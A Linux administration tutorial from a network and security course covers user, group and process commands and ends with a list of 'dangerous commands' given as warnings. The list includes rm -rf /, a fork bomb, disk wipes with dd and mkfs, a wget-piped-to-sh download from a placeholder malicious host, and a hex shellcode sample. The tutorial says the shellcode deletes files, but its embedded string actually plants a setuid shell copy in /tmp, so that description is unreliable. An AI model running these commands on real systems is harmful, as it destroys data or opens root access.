HND2

Network and Security

Linux Network Administration: NWS

TUTORIAL 1

Lecturer : Mavel TATKEU Email : maveltatkeu@gmail.com

Page 1 / 11
 Linux: Working with shel (part2)

I- User and group

1- Create User in Linux

Use adduser or useradd command to create user accounts on Linux system. Some of the operating
systems provide only one command. All the user’s entry is available in /etc/passwd file.
Syntax:
$ adduser [options] USER_NAME

adduser vs useradd command

On Debian systems, adduser is a separate Perl script to create user accounts with enhanced options. It
also uses the useradd command in the background for creating accounts. But on Redhat and many other
derivatives just have adduser as symlink of useradd command.

Create User in Linux

Use the adduser command to create user test on your system. This will prompt for the password and
some other details on Debian systems.

$ adduser test

You can also override the default values with adduser command. For example to specify the home
directory and the default shell for the user.

$ adduser --home "/var/www/test" --shell "/bin/sh" test

2- Modify User in Linux

Use usermod command to modify/update existing user account in Linux.

Syntax:
$ usermod [options] USER_NAME

Example:
Change the default shell of user myuser to /usr/sbin/nologin. Use -s or –shell to update default shell.
$ usermod --shell "/usr/sbin/nologin" myuser

Page 2 / 11
Change Home Directory

Use -d or –home switch to change the current home directory of user. The new directory will create
automatically, but the parent directory of new home must be exist.

$ usermod --home "/var/home/myuser" myuser

You can also use -m or –move-home with above switch to move content of home directory as well.

$ usermod --move-home --home "/var/home/myuser" myuser

Lock and Unlock User

Use -L or –lock to lock specific account in Linux system. Use -U or –unlock to unlock any locked user
account under Linux system.

$ usermod --lock myuser ## Lock account

$ usermod --unlock myuser ## Unlock account

Change Primary Group

Use -g or –gid to forcefully change the user’s primary group. For example, set “staff” as the primary group
for the myuser account.

$ usermod --gid staff myuser

Adding User to Secondary Group

Use -G or –groups to add a user in multiple secondary groups. For example add myuser to staff, accounts
group.

$ usermod -G staff,accounts myuser

3- Delete User in Linux

Use userdel command to delete existing user from Linux system.

Syntax:
$ userdel [options] USER_NAME

Example:
Below command will delete the user myuser from your system but keep the home directory.
$ userdel myuser

Use -r or –remove to remove the home directory with content also.

Page 3 / 11
$ userdel --remove myuser

4- Linux Add Group

Use groupadd or addgroup command to create new user group in Linux system.
Syntax:
$ addgroup GROUP_NAME

Example:
Let’s create a group named “testgroup”.

$ addgroup testgroup
Add User to Group

Use usermod command to add user in secondary group.

$ usermod -G testgroup testuser

You can view the group’s names of the user belongs to.

$ groups testuser

testuser : testuser testgroup

Assign Group during Create New User

You can also assign the specific group during create creation process. This will also create the primary
group

$ useradd -G testgroup rahul

5- Linux who command

Use who command is used to find current logged in users in your system along with other useful details.
You can find details like remote IP address, terminal details, date/time of login etc.
Syntax:
$ who [options]
Find All Login Users

List all users currently logged in to your system.

$ who

Output:

Page 4 / 11
rahul pts/8 2017-09-05 16:23 (192.168.1.10)
root pts/9 2017-09-05 17:32 (192.168.1.13)
Find Current Login User
You can also use the following command to print username of current logged in user.

$ who am i

Output:
rahul pts/9 2017-09-05 17:32 (192.168.1.10)
6- Linux whoami command

Linux whoami command is used to get current logged in username. This command is most helpful with
Shell scripting to find if the current user is root or not.
Example:
$ whoami

Output:
rahul
7- Linux chage command

The chage command is used to set account expiration date for user. It also changes the time the user’s
password will expire.
Syntax:
$ chage [options] LOGIN
Examples:-

a) Set Password Expiry Days of User

Set the number of days to expire password after last change. It means the user will force to change its
password after 15 days of last change.

$ chage -M 15 testuser
b) Set Account Password Expiry Warning Date

You can also set the password expiry warning date. So that user gets alert for the password expiration and
to change the password.

$ chage -W 3 testuser

Page 5 / 11
 c) Set Account Expiry Date of User

You can also set the expiry date of any user in Linux system. The account will automatically deactivate
after passing the expiry date. Use the following command to set the expiration date of account to Nov 16,
2019.

$ chage --expiredate "16 NOV 2019" testuser

d) List Account Aging Details

Run the following command to view the aging details of the user account.

$ chage -l testuser
e) Disable Password and Account Expiry

You can disable the password and account expiry any time using the following command.

$ chage -I -1 -m 0 -M 99999 -E -1 testuser

f) Force User to Change Password

You can also set the expiry date to 0 to force a user to change accounts password on next login.

$ chage –d 0 testuser

II- Processes
Many of the commands here perform a single function and can be combined — that’s the Unix philosophy of designing
programs. Other programs, like htop, provide a friendly interface on top of the commands.
1- Linux top command
The top command is the traditional way to view your system’s resource usage and see the processes that
are taking up the most system resources. Top displays a list of processes, with the ones using the most
CPU at the top.

To exit top or htop, use the Ctrl-C keyboard shortcut. This keyboard shortcut usually kills the
currently running process in the terminal.

2- Linux htop command

The htop command is an improved top. It’s not installed by default on most Linux distributions — here’s
the command you’ll need to install it on Ubuntu:

sudo apt-get install htop

Page 6 / 11
htop displays the same information with an easier-to-understand layout. It also lets you select processes with the
arrow keys and perform actions, such as killing them or changing their priority, with the F keys.
3- Linux ps command

The ps command lists running processes. The following command lists all processes running on your
system:

ps -A

This may be too many processes to read at one time, so you can pipe the output through
theless command to scroll through them at your own pace:

ps -A | less

Press q to exit when you’re done.

You could also pipe the output through grep to search for a specific process without using any other
commands. The following command would search for the Firefox process:

ps -A | grep firefox
4- Linux pstree command

The pstree command is another way of visualizing processes. It displays them in tree format. So, for
example, your X server and graphical environment would appear under the display manager that
spawned them.

5- Linux kill command

The kill command can kill a process, given its process ID. You can get this information from the ps -
A, top or pgrep commands.

kill PID

Technically speaking, the kill command can send any signal to a process. You can use kill -KILL or kill -
9 instead to kill a stubborn process.

6- Linux pgrep command

Given a search term, pgrep returns the process IDs that match it. For example, you could use the
following command to find Firefox’s PID:
Page 7 / 11
pgrep firefox
7- Linux pkill & killall command

The pkill and killall commands can kill a process, given its name. Use either command to kill Firefox:

pkill firefox
killall firefox
8- Linux renice command

The renice command changes the nice value of an already running process. The nice value determines
what priority the process runs with. A value of -19 is very high priority, while a value of 19 is very low
priority. A value of 0 is the default priority.

The renice command requires a process’s PID. The following command makes a process run with very
low priority:

renice 19 PID

You can use the pgrep trick above with renice, too.

If you’re making a process run at a higher priority, you’ll require root permissions. On Ubuntu,
use sudo for that:

sudo renice -19 #

9- Linux xkil command

The xkill command is a way of easily killing graphical programs. Run it and your cursor will turn into
an x sign. Click a program’s window to kill that program. If you don’t want to kill a program, you can
back out of xkill by right-clicking instead.

III- Most Dangerous Commands – Never Execute on Linux

Linux command line is productive, useful and interesting but sometimes it may be very much dangerous
especially when you are not sure what you are doing. This article is not intended to make you furious
of Linux or Linux command line. We just want to make you aware of some of the commands which you
should think twice before you execute them.

Page 8 / 11
 1- rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or
ignorance may result into unrecoverable system damage. The some of options used with rm
command are.
rm command in Linux is used to delete files.
rm -r command deletes the folder recursively, even the empty folder.
rm -f command removes ‘Read only File’ without asking.
rm -rf / : Force deletion of everything in root directory.
rm -rf * : Force deletion of everything in current directory/working directory.
rm -rf . : Force deletion of current folder and sub folders.
Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘
command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every
deletion.

2- :(){:|:&};: Command

The above is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once
in the foreground and once in the background. It keeps on executing again and again till the system
freezes.

:(){:|:&};:

3- command > /dev/sda

The above command writes the output of ‘command‘ on the block /dev/sda. The above command writes
raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data
on the block.
4- mv folder /dev/null

The above command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that
discards all the data written to it and reports that write operation succeed.
# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means
everything there was sent to blackhole (null).
Page 9 / 11
 5- wget http://malicious_source -O- | sh

The above command will download a script from a malicious source and then execute it. Wget command
will download the script and sh will execute the downloaded script.
Note: You should be very much aware of the source from where you are downloading packages and
scripts. Only use those scripts/applications which is downloaded from a trusted source.

6- mkfs.ext3 /dev/sda

The above command will format the block ‘sda’ and you would surely be knowing that after execution of
the above command your Block (Hard Disk Drive) would be new, BRAND NEW! Without any data, leaving
your system into unrecoverable stage.
7- > file

The above command is used to flush the content of file. If the above command is executed with a typo or
ignorance like “> xt.conf” will write the configuration file or any other system or configuration file.
8- ^foo^bar

This command, is used to edit the previous run command without the need of retyping the whole
command again. But this can really be troublesome if you didn’t took the risk of thoroughly checking the
change in original command using ^foo^bar command.

9- dd if=/dev/random of=/dev/sda

The above command will wipe out the block sda and write random junk data to the block. Of-course! Your
system would be left at inconsistent and unrecoverable stage.
10- Hidden the Command

The below command is nothing but the first command above (rm -rf). Here the codes are hidden in hex so
that an ignorant user may be fooled. Running the below code in your terminal will wipe
your root partition.
This command here shows that the threat may be hidden and not normally detectable sometimes. You
must be aware of what you are doing and what would be the result. Don’t compile/run codes from an
unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p

Page 10 / 11
release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

Note: Don’t execute any of the above command in your Linux terminal or shell or of your friend or school
computer. If you want to test them, run them in virtual machine. Any in-consistence or data loss, due to
the execution of above command will break your system down for which, neither the Author of the article
nor anyone is responsible.

Page 11 / 11